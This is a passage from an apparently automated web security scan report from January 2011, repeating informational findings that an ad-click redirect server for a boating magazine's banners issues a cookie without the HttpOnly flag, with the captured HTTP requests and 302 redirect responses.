Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:11:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:48:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.445. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

14.449. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:27:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 402
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run
...[SNIP]...

14.453. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:59:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:39:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:06:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
